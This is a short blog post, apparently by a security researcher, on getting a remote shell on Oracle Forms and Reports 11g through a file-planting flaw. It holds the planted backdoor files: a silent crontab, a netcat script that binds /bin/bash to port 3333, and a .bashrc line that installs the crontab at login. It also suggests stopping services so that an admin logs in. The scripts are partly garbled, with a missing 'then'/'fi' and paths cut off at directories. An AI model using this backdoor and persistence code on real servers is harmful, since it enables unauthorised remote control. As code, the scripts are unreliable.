Getting a remote shell on Oracle Forms and Reports 11g

UPDATE: There are actually two CVE-VULNERABILITIES here. CVE-2012-1734 which was discovered using my vulnerability that allows planting of files. Credit goes to  the University of Texas at Austin Information Security Office.

Earlier I laid down for a nap (which I call pillow hugging) and my mind was racing. I was thinking about Oracle Reports and what other way I could exploit the vulnerability (CVE-2012-3152) which I discovered back in 2011. Gaining a remote shell was what I was thinking about so I jumped out of bed, grabbed a cup of coffee and lit a cigarette up and went to work.

I spent the entire day on this project partly because I found Oracle Linux’s version of netcat to not include the -e option which allows you to pipe a program into it such as /bin/sh. I did some research and found a way to make it work.

At this time, I am not publishing the exploit vector.

I planted 3 files on the server

  1. A crontab file
  2. My shell script to run netcat and pipe /bin/sh into it
  3. .bashrc in /home/oracle

 Crontab File

*,1 * * * * chmod +x /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/ >> /dev/null 2>&1
*,1 * * * * sh /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/ >> /dev/null 2>&1

Netcat Shell Script

myvar=`echo $RANDOM`
mycommand=`mkfifo ._$myvar; nc -lk 3333 0<._$myvar | /bin/bash &>._$myvar;`
netstat -nat|grep 3333
if [[ $? -eq 0 ]] ;
echo “shell already started”
sh $mycommand &


# .bashrc
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
# User specific aliases and functions
crontab /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/crontab
This was the best way I could come up with to get it to run and have it setup where it would continue to run no matter if the user logged out or not. Once someone logged into the oracle account, the server was pwn3d. You could easily get someone to the console really fast by stopping a service or two. :-)
I think they underestimated the danger of this vulnerability. Their approach to “fixing” it was inadequate at best. Enjoy the demo!


Comments are closed.